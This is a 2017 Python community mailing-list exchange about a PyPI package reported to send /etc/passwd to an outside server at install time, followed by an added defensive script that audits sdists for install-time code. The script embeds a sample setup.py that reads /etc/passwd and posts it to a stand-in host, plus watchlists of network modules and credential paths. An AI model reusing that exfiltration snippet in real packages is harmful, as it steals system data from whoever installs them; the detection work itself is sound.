[PSF-Community] Dangerous PyPI packages and PSF

Noah Kantrowitz noah at coderanger.net
Fri May 5 00:22:28 EDT 2017


> On May 4, 2017, at 4:41 PM, Bruno Rocha <rochacbruno at gmail.com> wrote:
> 
> Hi,
> 
> I just read this on reddit[0], a thread asking if PyPI packages are audited, and somebody pointed to `python-nation`[1], which is a harmful and useless module that installs itself and sends the `/etc/passwd` contents to an external endpoint.
> 
> The app receiving the data is hosted at http://python-nation.herokuapp.com
> 
> and as the PSF mission [2] says
> 
> The mission of the Python Software Foundation is to promote, protect, and advance the Python programming language
> 
> I wonder if there is some workgroup at the PSF to handle this, and not only the specific case of `python-nation`, which should be deleted and the user banned maybe, but also the audit of other packages?
> 
> 
> [0] https://www.reddit.com/r/Python/comments/697da2/does_pypi_review_code_thats_uploaded/
> [1] https://www.reddit.com/r/Python/comments/697da2/does_pypi_review_code_thats_uploaded/dh4uyf8/
> [2] https://www.python.org/psf/mission/

Specifically re: the vector of running code at install time, wheels can help with this though I don't think there is a good way to tell pip to ignore non-wheel builds. But even then, the whole point is that you're downloading code from the internet :) If you want to discuss this further I recommend the distutils-sig mailing list.

--Noah
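Noah's point about the install-time vector, illustrated with an added example (mine, not code from this thread, from pip or from PyPI): an sdist carries a `setup.py` that pip executes in order to build and install the package, whereas a wheel is a zip archive that is only unpacked, so nothing from it runs until the package is imported. The script below constructs a tiny sdist and a tiny wheel in memory, reports which of the two can run code at install time, and runs a small AST scan over the sdist's `setup.py` for network imports and sensitive-path strings. The `setup.py` bodies are constructed to mirror the behaviour described in the thread, not the real `python-nation` code; the hostname example.invalid and the module and path watchlists are my own assumptions. As a practical caveat to the reply above, `pip install --only-binary=:all: <pkg>` makes pip refuse source distributions entirely, which closes this vector at the cost of skipping packages published only as sdists.

```python
import ast
import io
import tarfile
import zipfile
from typing import Dict, List, Optional

# Constructed sample setup.py files (not the real python-nation package).
# The first mimics the behaviour the thread describes: read /etc/passwd
# and ship it to a remote endpoint while pip is "installing" the package.
MALICIOUS_SETUP_PY = b'''\
from setuptools import setup
import urllib.request
data = open("/etc/passwd", "rb").read()
urllib.request.urlopen("http://example.invalid/collect", data)
setup(name="demo", version="0.1")
'''

BENIGN_SETUP_PY = b'''\
from setuptools import setup
setup(name="demo", version="0.1")
'''

# Assumed watchlists: modules that give setup.py a network or exec channel,
# and paths an installer has no business reading.
SUSPICIOUS_MODULES = {"urllib", "urllib.request", "urllib2", "socket",
                      "requests", "subprocess", "http.client", "httplib", "ctypes"}
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow", ".ssh", ".aws", ".netrc")


def make_sdist(setup_py: bytes) -> bytes:
    """Build a minimal .tar.gz source distribution containing only setup.py."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo("demo-0.1/setup.py")
        info.size = len(setup_py)
        tar.addfile(info, io.BytesIO(setup_py))
    return buf.getvalue()


def make_wheel() -> bytes:
    """Build a minimal wheel: pure data, no setup.py, nothing executable at install."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("demo/__init__.py", "VERSION = '0.1'\n")
        zf.writestr("demo-0.1.dist-info/METADATA",
                    "Metadata-Version: 2.1\nName: demo\nVersion: 0.1\n")
        zf.writestr("demo-0.1.dist-info/WHEEL", "Wheel-Version: 1.0\n")
    return buf.getvalue()


def extract_setup_py(sdist: bytes) -> Optional[bytes]:
    """Return the top-level setup.py of an sdist (the file pip will execute), if any."""
    with tarfile.open(fileobj=io.BytesIO(sdist), mode="r:gz") as tar:
        for member in tar.getmembers():
            parts = member.name.split("/")
            if len(parts) == 2 and parts[1] == "setup.py" and member.isfile():
                return tar.extractfile(member).read()
    return None


def audit_setup_py(source: bytes) -> List[str]:
    """Static heuristic scan: flag suspicious imports and sensitive path literals."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name in SUSPICIOUS_MODULES:
                    findings.append(f"imports {alias.name} at line {node.lineno}")
        elif isinstance(node, ast.ImportFrom):
            if node.module in SUSPICIOUS_MODULES:
                findings.append(f"imports from {node.module} at line {node.lineno}")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            for path in SENSITIVE_PATHS:
                if path in node.value:
                    findings.append(f"references {path!r} at line {node.lineno}")
    return findings


def audit_distribution(filename: str, payload: bytes) -> Dict[str, object]:
    """Decide whether a downloaded distribution can run code during pip install."""
    if filename.endswith(".whl"):
        # Wheels are unpacked, never executed: no install-time hook exists.
        return {"runs_code_at_install": False, "findings": []}
    if filename.endswith(".tar.gz"):
        setup_py = extract_setup_py(payload)
        if setup_py is None:
            return {"runs_code_at_install": False,
                    "findings": ["sdist without top-level setup.py"]}
        return {"runs_code_at_install": True, "findings": audit_setup_py(setup_py)}
    raise ValueError(f"unrecognised distribution type: {filename}")


if __name__ == "__main__":
    for name, blob in [("demo-0.1-py3-none-any.whl", make_wheel()),
                       ("demo-0.1.tar.gz", make_sdist(MALICIOUS_SETUP_PY)),
                       ("demo-0.1.tar.gz", make_sdist(BENIGN_SETUP_PY))]:
        print(name, audit_distribution(name, blob))
```

The AST scan is a triage aid, not a verdict: a `setup.py` can hide the same behaviour behind `exec` of a decoded string or a helper module shipped alongside it, so a clean scan means only that nothing obvious is in the top-level file, while a flagged one deserves a read before it is ever installed on a machine that matters.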

